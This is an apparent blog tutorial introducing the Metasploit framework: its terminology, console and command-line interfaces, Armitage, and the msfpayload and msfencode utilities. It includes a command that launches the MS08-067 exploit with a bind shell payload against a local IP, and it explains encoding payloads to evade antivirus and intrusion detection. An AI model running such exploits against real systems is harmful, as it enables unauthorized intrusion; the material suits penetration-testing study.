Why Metasploit?
Metasploit isn’t just a tool; it’s an entire framework that provides the infra-structure needed to automate mundane, routine, and complex tasks. This allows you to concentrate on the unique or specialized aspects of penetration
testing and on identifying flaws within your information security program.
a.Terminology
i.Exploit
exploit is the means by which an attacker, or pen tester for that matter, takes advantage of a flaw within a system, an application, or a service. An attacker uses an exploit to attack a system in a way that results in a particular desired outcome that the developer never intended.
II.payload
A payload is code that we want the system to execute and that is to be selectedand delivered by the Framework. For example, a reverse shell is a payload thatcreates a connection from the target machine back to the attacker as a Windows command prompt , whereas a bind shell is a payload that “binds” a command prompt to a listening port on the target machine, which the attacker can then connect
b. Metasploit Interfaces
1.Metasploit offers more than one interface to its underlying functionality,including console, command line, and graphical interfaces
i.MSFconsole
Msfconsole is by far the most popular part of the Metasploit Framework, and for good reason. It is one of the most flexible, feature-rich, and well-supported tools within the Framework. Msfconsole provides a handy all-in-one interface to almost every option and setting available in the Framework; it’s like a one-stop shop for all of your exploitation dreams. You can use msfconsole to do everything, including launching an exploit, loading auxiliary modules,performing enumeration, creating listeners, or running mass exploitation against an entire network.
#msfconsole
#help connect
ii.MSFcli
Msfcli and msfconsole take very different approaches to providing access to theFramework. Where msfconsole provides an interactive way to access all features in a user-friendly manner, msfcli puts the priority on scripting and interpret ability with other console-based tools.
Example.
#msfcli -h
#msfcli <exploit_name> <option=value> [mode]
#msfcli windows/smb/ms08_067_netapi O-->shows option of exploit ms08_067_netapi
#msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 P --> p search for avalable payload
#msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E-->for exploiting
iii.Armitage
The armitage component of Metasploit is a fully interactive graphical user interface created by Raphael Mudge. This interface is highly impressive, feature rich, and available for free. We won’t be covering armitage in depth, but it is definitely worth mentioning as something to explore. Our goal is to teach the ins and outs of Metasploit, and the GUI is awesome once youunderstand how the Framework actually operates. for starting armitage the following two service should be recommended to start.
#/etc/init.d/postgres start
#/etc/init.d/metasploit start
#armitage
c.Metasploit Utilities
i.MSFpayload
The msfpayload component of Metasploit allows you to generate shellcode,executables, and much more for use in exploits outside of the Framework.
#msfpayload -l
ii.MSFencode
The shellcode generated by msfpayload is fully functional, but it contains several null characters that, when interpreted by many programs, signify the end of a string, and this will cause the code to terminate before completion.
In other words, those x00s and xffs can break your payload! In addition, shellcode traversing a network in cleartext is likely to be
picked up by intrusion detection systems (IDSs) and antivirus software. To address this problem, Metasploit’s developers offer msfencode, which helps you to avoid bad characters and evade antivirus and IDSs by encoding the original payload in a way that does not include “bad” characters. Enter
msfencode -h to see a list of msfencode options.
Enjoyyy
Comments
Post a Comment